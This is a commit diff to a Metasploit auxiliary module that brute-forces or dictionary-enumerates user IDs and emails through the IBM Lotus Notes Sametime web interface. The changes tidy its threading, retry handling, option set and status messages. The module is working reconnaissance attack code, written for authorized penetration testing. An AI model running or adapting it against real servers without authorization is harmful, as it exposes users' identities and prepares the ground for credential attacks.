Clean multi-threading on ibm_sametime_enumerate_users
parent
bb3d9da0bb
commit
d96772ead1
|
@ -19,16 +19,16 @@ class Metasploit3 < Msf::Auxiliary
|
|||
This module extracts users using the IBM Lotus Notes Sametime web
|
||||
interface using either brute-force or dictionary based attack.
|
||||
},
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => true
|
||||
},
|
||||
'Author' =>
|
||||
[
|
||||
'kicks4kittens' # Metasploit module
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'DisclosureDate' => 'Dec 27 2013',
|
||||
'DefaultOptions' =>
|
||||
{
|
||||
'SSL' => true
|
||||
}
|
||||
'DisclosureDate' => 'Dec 27 2013'
|
||||
))
|
||||
|
||||
register_options(
|
||||
|
@ -38,8 +38,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
OptEnum.new('CHARSET', [true, 'Charset to use for enumeration', 'alpha', ['alpha', 'alphanum', 'num'] ]),
|
||||
OptEnum.new('TYPE', [true, 'Specify UID or EMAIL', 'UID', ['UID', 'EMAIL'] ]),
|
||||
OptPath.new('DICT', [ false, 'Path to dictionary file to use', '']),
|
||||
OptInt.new('MAXDEPTH', [ true, 'Maximum depth to check during brute-force', 2]),
|
||||
OptBool.new('STREAMFINDINGS', [true, 'Stream new users as discovered', true])
|
||||
OptInt.new('MAXDEPTH', [ true, 'Maximum depth to check during brute-force', 2])
|
||||
], self.class)
|
||||
|
||||
register_advanced_options(
|
||||
|
@ -97,13 +96,11 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
@depth_warning = true
|
||||
@tested = []
|
||||
@retries = []
|
||||
end
|
||||
|
||||
def run
|
||||
|
||||
print_status("Testing #{peer} for IBM Lotus Notes Sametime User Enumeration flaw")
|
||||
print_status("#{peer} - Testing for IBM Lotus Notes Sametime User Enumeration flaw")
|
||||
|
||||
# test for expected response code on non-existant uid/email
|
||||
if datastore['TYPE'] == "UID"
|
||||
|
@ -150,7 +147,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
def test_handler
|
||||
print_status("Beginning tests using #{datastore['TYPE']} search method (#{datastore['Threads']} Threads)")
|
||||
print_status("#{peer} - Beginning tests using #{datastore['TYPE']} search method (#{datastore['Threads']} Threads)")
|
||||
test_length = 1 # initial test length set
|
||||
|
||||
until @test_queue.empty?
|
||||
|
@ -171,7 +168,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# provide feedback to user on current test length
|
||||
if datastore['DICT'].blank? and test_current.length > test_length
|
||||
test_length = test_current.length
|
||||
print_status("Beginning brute_force test for #{test_length} character strings")
|
||||
print_status("#{peer} - Beginning brute_force test for #{test_length} character strings")
|
||||
end
|
||||
|
||||
res = make_request(test_current)
|
||||
|
@ -180,25 +177,15 @@ class Metasploit3 < Msf::Auxiliary
|
|||
if res.nil? and not @retries.include?(test_current)
|
||||
# attempt test again as the server was too busy to respond
|
||||
# correctly - error returned
|
||||
print_error("Error reading JSON response, attempting to redo check for \"#{test_current}\"")
|
||||
Rex::sleep(1) # sleep 1 second and retry request
|
||||
print_error("#{peer} - Error reading JSON response, attempting to redo check for \"#{test_current}\"")
|
||||
@test_queue.push(test_current)
|
||||
@retries << test_current
|
||||
res = make_request(test_current)
|
||||
if @retries.length == 10
|
||||
print_error("#{peer} - Excessive number of retries detected (#{@retries.length}... check the TIMING and Threads options)")
|
||||
end
|
||||
|
||||
if res
|
||||
elsif res
|
||||
# check response for user data
|
||||
check_response(res, test_current)
|
||||
elsif not @retries.include?(test_current)
|
||||
vprint_error("No response received from server when testing string \"#{test_current}*\" (Retrying)")
|
||||
@retries << test_current
|
||||
Rex::sleep(1) # sleep 1 second and retry
|
||||
res = make_request(test_current)
|
||||
end
|
||||
|
||||
if @retries.length == 10
|
||||
print_error("Excessive number of retries detected (#{@retries.length} check TIMING)")
|
||||
@retries << "warning sent to user" # increase length to avoid multiple warnings
|
||||
end
|
||||
end
|
||||
end
|
||||
|
@ -239,14 +226,7 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# successful response - extract user data
|
||||
extract_user(res)
|
||||
# extend test_queue to search for further data (not if dictionary in use)
|
||||
extend_queue(test_current) if (datastore['DICT'].nil? or datastore['DICT'].empty?)
|
||||
return true
|
||||
elsif JSON.parse(res.body).blank? # empty JSON element
|
||||
# expected failure for non-existent user - must return false
|
||||
return false
|
||||
else
|
||||
# unexpected failure
|
||||
print_error("Unexpected response received from server #{peer}")
|
||||
extend_queue(test_current) if (datastore['DICT'].blank?)
|
||||
end
|
||||
rescue JSON::ParserError
|
||||
# non-JSON response - server may be overloaded
|
||||
|
@ -258,54 +238,41 @@ class Metasploit3 < Msf::Auxiliary
|
|||
# extract user data if not already present
|
||||
begin
|
||||
userinfo = JSON.parse(res.body)
|
||||
if not @user_data.flatten.include?(userinfo['uid'])
|
||||
unless @user_data.flatten.include?(userinfo['uid'])
|
||||
@user_data << [ userinfo['uid'], userinfo['mail'] || "-", userinfo['externalName'] || "-" ]
|
||||
if datastore['STREAMFINDINGS']
|
||||
# print newly discovered users straight to the screen
|
||||
print_good("New user found: #{userinfo['uid']}")
|
||||
end
|
||||
# print newly discovered users straight to the screen if verbose mode is set
|
||||
vprint_good("#{peer} - New user found: #{userinfo['uid']}")
|
||||
report_user(userinfo['uid'])
|
||||
end
|
||||
rescue JSON::ParserError
|
||||
print_error("Error reading JSON string, continuing")
|
||||
print_error("#{peer} - Error reading JSON string, continuing")
|
||||
end
|
||||
end
|
||||
|
||||
# extend the test queue if MAXDEPTH value not exceeded
|
||||
# checks made to ensure duplicates are not created when extending
|
||||
|
||||
# process:
|
||||
#
|
||||
# when a user is found searching for 'a' the queue for 'a' is extended as
|
||||
# only the first user starting with 'a' will be returned (e.g. 'aanderson')
|
||||
# To find all users the queue must be extended by adding 'aa' through to 'az'
|
||||
# Due to the threaded nature of this module, checks need to be in place to ensure
|
||||
# duplicate entries are not added to the queue by competing threads.
|
||||
def extend_queue(test_current)
|
||||
|
||||
if test_current.length < datastore['MAXDEPTH']
|
||||
@charset.each do | char |
|
||||
if not @tested.include?(test_current + char)
|
||||
# only add if not alread in queue - avoid duplicates appearing
|
||||
@test_queue.push(test_current + char)
|
||||
# keep track of whats already been queued and checked
|
||||
@tested.push(test_current + char)
|
||||
end
|
||||
end
|
||||
elsif @depth_warning and test_current.length == datastore['MAXDEPTH'] and not datastore['MAXDEPTH'] == 1
|
||||
vprint_status("Depth limit reached [#{datastore['MAXDEPTH']} levels deep] finishing up current tests")
|
||||
elsif @depth_warning and test_current.length == datastore['MAXDEPTH'] and datastore['MAXDEPTH'] > 1
|
||||
vprint_status("#{peer} - Depth limit reached [#{datastore['MAXDEPTH']} levels deep] finishing up current tests")
|
||||
@depth_warning = false
|
||||
return
|
||||
end
|
||||
|
||||
end
|
||||
|
||||
def report_user(username)
|
||||
report_note(
|
||||
:host => rhost,
|
||||
:port => rport,
|
||||
:proto => 'tcp',
|
||||
:sname => 'sametime',
|
||||
:port => rport,
|
||||
:type => 'ibm_lotus_sametime_user',
|
||||
:data => "#{username}",
|
||||
:update => :unique_data
|
||||
|
@ -333,10 +300,10 @@ class Metasploit3 < Msf::Auxiliary
|
|||
end
|
||||
|
||||
if not user_tbl.to_s.empty?
|
||||
print_good("#{@user_data.length} users extracted from #{peer}")
|
||||
print_good("#{peer} - #{@user_data.length} users extracted")
|
||||
print_line(user_tbl.to_s)
|
||||
else
|
||||
print_error("No users discovered")
|
||||
print_error("#{peer} - No users discovered")
|
||||
end
|
||||
end
|
||||
end
|
||||
|
|
Loading…
Reference in New Issue